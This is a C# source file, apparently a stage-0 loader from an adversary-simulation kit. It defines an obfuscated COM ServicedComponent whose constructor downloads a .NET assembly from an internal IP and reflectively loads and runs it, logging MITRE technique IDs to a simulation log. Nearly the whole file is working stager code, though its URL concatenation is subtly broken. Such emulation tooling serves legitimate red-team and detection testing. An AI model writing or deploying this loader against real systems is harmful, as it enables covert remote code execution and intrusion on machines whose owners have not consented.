using System;
using System.IO;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.EnterpriseServices;

[ComVisible(true)]
[Guid("E5D7B3A1-9C8F-4D2E-B1A3-6F5D9C8E2A4B")]
public class zxddff : ServicedComponent
{
    const string omczkkb = "Macula-Stage0-7228";
    const string dvvndez = "NAHUA-S4N";
    const string fnxlaxve = "10";
    const string kqwvoowe = "https://10.0.0.49";
    const string vqpfmpu = "7228";
    const string nfkxl = "https://10.0.0.49/stage/7228-10/3";
    const string jypjeu = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/517.36 (HTML";

    public zxddff()
    {
        byte[] qwmnb = null;
        string xrtyui = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), fnxlaxve);
        
        try
        {
            using (WebClient mmnnbb = new WebClient())
            {
                mmnnbb.Headers.Add("User-Agent", jypjeu);
                string plmkoi = kqwvoowe + nfkxl;
                
                try
                {
                    qwmnb = mmnnbb.DownloadData(plmkoi);
                    string qazwsx = $"[{DateTime.Now:yyyy-MM-dd HH:mm:ss.fff}][{dvvndez}-{omczkkb}]: {fnxlaxve}-{vqpfmpu}-T1105|Ingress Tool Transfer=1:";
                    File.AppendAllText(Path.Combine(xrtyui, "macula-simulations.log"), qazwsx + Environment.NewLine);
                }
                catch (WebException ex)
                {
                    string qazwsx = $"[{DateTime.Now:yyyy-MM-dd HH:mm:ss.fff}][{dvvndez}-{omczkkb}]: {fnxlaxve}-{vqpfmpu}-T1105|Ingress Tool Transfer=0:{ex.Status}";
                    File.AppendAllText(Path.Combine(xrtyui, "macula-simulations.log"), qazwsx + Environment.NewLine);
                    return;
                }
            }

            if (qwmnb != null && qwmnb.Length > 0)
            {
                try
                {
                    Assembly yhnujm = Assembly.Load(qwmnb);
                    MethodInfo poiuy = yhnujm.EntryPoint;
                    
                    if (poiuy != null)
                    {
                        object[] lkjhg = null;
                        if (poiuy.GetParameters().Length > 0) lkjhg = new object[] { new string[0] };
                        
                        poiuy.Invoke(null, lkjhg);
                        string qazwsx = $"[{DateTime.Now:yyyy-MM-dd HH:mm:ss.fff}][{dvvndez}-{omczkkb}]: {fnxlaxve}-{vqpfmpu}-T1620|Reflective Code Loading=1:";
                        File.AppendAllText(Path.Combine(xrtyui, "macula-simulations.log"), qazwsx + Environment.NewLine);
                    }
                }
                catch (Exception ex)
                {
                    string qazwsx = $"[{DateTime.Now:yyyy-MM-dd HH:mm:ss.fff}][{dvvndez}-{omczkkb}]: {fnxlaxve}-{vqpfmpu}-T1620|Reflective Code Loading=0:{ex.GetType().Name}";
                    File.AppendAllText(Path.Combine(xrtyui, "macula-simulations.log"), qazwsx + Environment.NewLine);
                }
            }
        }
        catch { }
    }

    [ComUnregisterFunction]
    public static void vcxzas(Type t)
    {
    }
}